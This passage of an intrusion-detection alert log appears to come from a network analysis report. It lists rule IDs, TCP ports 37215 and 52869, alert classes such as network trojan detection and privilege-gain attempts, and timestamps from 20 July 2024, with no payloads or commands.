                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.865744
                      SID:2831300
                      Source Port:44028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.324524
                      SID:2835222
                      Source Port:36590
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.994181
                      SID:2027339
                      Source Port:58590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.787162
                      SID:2025132
                      Source Port:49926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:29.715968
                      SID:2831300
                      Source Port:58350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.945161
                      SID:2027339
                      Source Port:41086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.107643
                      SID:2831300
                      Source Port:52982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:21.994838
                      SID:2027339
                      Source Port:56248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:07.975226
                      SID:2027339
                      Source Port:51690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.297302
                      SID:2829579
                      Source Port:43358
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.444445
                      SID:2027339
                      Source Port:52660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:21.395373
                      SID:2027339
                      Source Port:37826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.124335
                      SID:2027339
                      Source Port:49002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.048573
                      SID:2829579
                      Source Port:58526
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.501276
                      SID:2027339
                      Source Port:48622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.323623
                      SID:2829579
                      Source Port:34392
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:32.673677
                      SID:2025132
                      Source Port:50512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.993749
                      SID:2829579
                      Source Port:41138
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.139140
                      SID:2831300
                      Source Port:43356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.780090
                      SID:2829579
                      Source Port:56324
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.296188
                      SID:2027339
                      Source Port:33442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.326250
                      SID:2831300
                      Source Port:46456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.446932
                      SID:2027339
                      Source Port:37440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.143657
                      SID:2835222
                      Source Port:59252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.983796
                      SID:2831300
                      Source Port:50040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.483611
                      SID:2831300
                      Source Port:45290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.682403
                      SID:2027339
                      Source Port:57596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.996045
                      SID:2025132
                      Source Port:50344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.861759
                      SID:2835222
                      Source Port:39550
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.120890
                      SID:2025132
                      Source Port:58876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.444444
                      SID:2831300
                      Source Port:37442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.338516
                      SID:2027339
                      Source Port:39348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.800446
                      SID:2835222
                      Source Port:57194
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.830981
                      SID:2027339
                      Source Port:40930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.143129
                      SID:2025132
                      Source Port:54360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.575004
                      SID:2025132
                      Source Port:40302
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:24.516178
                      SID:2025132
                      Source Port:34140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.648285
                      SID:2831300
                      Source Port:49312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.205784
                      SID:2831300
                      Source Port:53372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.593241
                      SID:2025132
                      Source Port:59872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.413785
                      SID:2027339
                      Source Port:40548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.898156
                      SID:2025132
                      Source Port:46166
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.678174
                      SID:2829579
                      Source Port:44694
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.119874
                      SID:2027339
                      Source Port:43536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.489725
                      SID:2027339
                      Source Port:36388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.378063
                      SID:2027339
                      Source Port:37580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.855214
                      SID:2831300
                      Source Port:34010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.164884
                      SID:2025132
                      Source Port:44186
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.478948
                      SID:2027339
                      Source Port:42368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.437584
                      SID:2835222
                      Source Port:51434
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.772131
                      SID:2025132
                      Source Port:40134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.404140
                      SID:2025132
                      Source Port:34824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.330840
                      SID:2025132
                      Source Port:60854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.733116
                      SID:2027339
                      Source Port:49876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:07.975226
                      SID:2025132
                      Source Port:50228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.203581
                      SID:2027339
                      Source Port:33044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.432998
                      SID:2027339
                      Source Port:55840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.064635
                      SID:2025132
                      Source Port:48600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.575727
                      SID:2831300
                      Source Port:33328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.472881
                      SID:2025132
                      Source Port:56468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:04.266985
                      SID:2025132
                      Source Port:34422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.239089
                      SID:2027339
                      Source Port:50550
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.572805
                      SID:2025132
                      Source Port:34632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.678174
                      SID:2829579
                      Source Port:57000
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.334876
                      SID:2027339
                      Source Port:33406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.740972
                      SID:2025132
                      Source Port:60774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.544570
                      SID:2831300
                      Source Port:40972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.954677
                      SID:2027339
                      Source Port:35922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.272030
                      SID:2027339
                      Source Port:60242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.344189
                      SID:2831300
                      Source Port:56976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:35.012567
                      SID:2025132
                      Source Port:48080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.402085
                      SID:2835222
                      Source Port:37014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.131821
                      SID:2027339
                      Source Port:57960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.224583
                      SID:2831300
                      Source Port:33796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.235312
                      SID:2027339
                      Source Port:59128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.714968
                      SID:2025132
                      Source Port:56142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.653253
                      SID:2835222
                      Source Port:39506
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.171719
                      SID:2831300
                      Source Port:55216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:03.190387
                      SID:2027339
                      Source Port:34542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.345103
                      SID:2027339
                      Source Port:45096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.439166
                      SID:2835222
                      Source Port:36762
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.445659
                      SID:2831300
                      Source Port:37392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:16.383377
                      SID:2027339
                      Source Port:49256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.374095
                      SID:2025132
                      Source Port:47062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.464931
                      SID:2831300
                      Source Port:52564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.257734
                      SID:2027339
                      Source Port:41878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.233976
                      SID:2027339
                      Source Port:37632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:32.673677
                      SID:2025132
                      Source Port:50066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.825307
                      SID:2025132
                      Source Port:46694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.245741
                      SID:2835222
                      Source Port:40508
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.355292
                      SID:2027339
                      Source Port:40506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.999787
                      SID:2831300
                      Source Port:34034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.513067
                      SID:2831300
                      Source Port:54620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.533759
                      SID:2835222
                      Source Port:52662
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:02.684157
                      SID:2027339
                      Source Port:52104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.087911
                      SID:2025132
                      Source Port:58738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.997059
                      SID:2027339
                      Source Port:39064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:11.472742
                      SID:2831300
                      Source Port:35226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.084343
                      SID:2025132
                      Source Port:50246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.392754
                      SID:2835222
                      Source Port:46510
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.762153
                      SID:2829579
                      Source Port:34328
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.570834
                      SID:2027339
                      Source Port:50574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.253105
                      SID:2027339
                      Source Port:39838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.570834
                      SID:2831300
                      Source Port:42698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.628611
                      SID:2831300
                      Source Port:43220
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.354373
                      SID:2829579
                      Source Port:57864
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:47.739427
                      SID:2831300
                      Source Port:53466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.590112
                      SID:2835222
                      Source Port:36998
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.090130
                      SID:2027339
                      Source Port:37662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.376181
                      SID:2027339
                      Source Port:56868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.677505
                      SID:2829579
                      Source Port:53664
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.804757
                      SID:2027339
                      Source Port:42824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.938284
                      SID:2025132
                      Source Port:38096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.940214
                      SID:2027339
                      Source Port:60852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.138961
                      SID:2831300
                      Source Port:43560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.104627
                      SID:2027339
                      Source Port:45428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.620754
                      SID:2829579
                      Source Port:52976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.316014
                      SID:2831300
                      Source Port:60050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.220141
                      SID:2025132
                      Source Port:55888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.479091
                      SID:2829579
                      Source Port:37036
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.520621
                      SID:2831300
                      Source Port:47784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.204956
                      SID:2027339
                      Source Port:45704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.747598
                      SID:2027339
                      Source Port:50650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.686159
                      SID:2027339
                      Source Port:46702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.328639
                      SID:2829579
                      Source Port:57694
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.945198
                      SID:2829579
                      Source Port:56910
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.343227
                      SID:2835222
                      Source Port:55188
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.392755
                      SID:2835222
                      Source Port:41840
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325773
                      SID:2829579
                      Source Port:39120
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.863090
                      SID:2835222
                      Source Port:59306
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.467111
                      SID:2025132
                      Source Port:32796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:27.335940
                      SID:2025132
                      Source Port:35854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.079797
                      SID:2835222
                      Source Port:56600
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.374360
                      SID:2027339
                      Source Port:34550
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.602976
                      SID:2025132
                      Source Port:46430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.527690
                      SID:2027339
                      Source Port:34258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.324524
                      SID:2835222
                      Source Port:56188
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.455250
                      SID:2027339
                      Source Port:42492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.402930
                      SID:2835222
                      Source Port:50444
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:15.422064
                      SID:2027339
                      Source Port:52270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.260516
                      SID:2025132
                      Source Port:37610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.442743
                      SID:2027339
                      Source Port:42508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.900558
                      SID:2027339
                      Source Port:35220
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.785367
                      SID:2831300
                      Source Port:48100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.403074
                      SID:2829579
                      Source Port:44744
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.589589
                      SID:2831300
                      Source Port:48694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.369631
                      SID:2025132
                      Source Port:46836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.934535
                      SID:2027339
                      Source Port:55924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.998297
                      SID:2027339
                      Source Port:39896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.812610
                      SID:2025132
                      Source Port:43380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.971073
                      SID:2027339
                      Source Port:46902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.494675
                      SID:2027339
                      Source Port:53926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.127943
                      SID:2835222
                      Source Port:40860
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.517784
                      SID:2025132
                      Source Port:48470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.469684
                      SID:2025132
                      Source Port:39906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.170455
                      SID:2027339
                      Source Port:56292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.697115
                      SID:2027339
                      Source Port:52434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.523045
                      SID:2027339
                      Source Port:50246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.171818
                      SID:2027339
                      Source Port:42718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.630378
                      SID:2025132
                      Source Port:47188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.514709
                      SID:2831300
                      Source Port:58868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:33.055161
                      SID:2025132
                      Source Port:41560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.211869
                      SID:2025132
                      Source Port:53970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.963469
                      SID:2025132
                      Source Port:40158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.231512
                      SID:2027339
                      Source Port:43714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.936056
                      SID:2027339
                      Source Port:34278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.981585
                      SID:2027339
                      Source Port:36402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.465013
                      SID:2831300
                      Source Port:34730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.237871
                      SID:2829579
                      Source Port:35800
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.182697
                      SID:2025132
                      Source Port:47490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.988990
                      SID:2829579
                      Source Port:57610
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.356121
                      SID:2027339
                      Source Port:37484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:20.681117
                      SID:2027339
                      Source Port:59468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.526908
                      SID:2835222
                      Source Port:39224
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:08.369781
                      SID:2831300
                      Source Port:34548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.136809
                      SID:2831300
                      Source Port:40580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.902488
                      SID:2027339
                      Source Port:55584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.287798
                      SID:2025132
                      Source Port:53836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.622609
                      SID:2835222
                      Source Port:50928
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.462432
                      SID:2027339
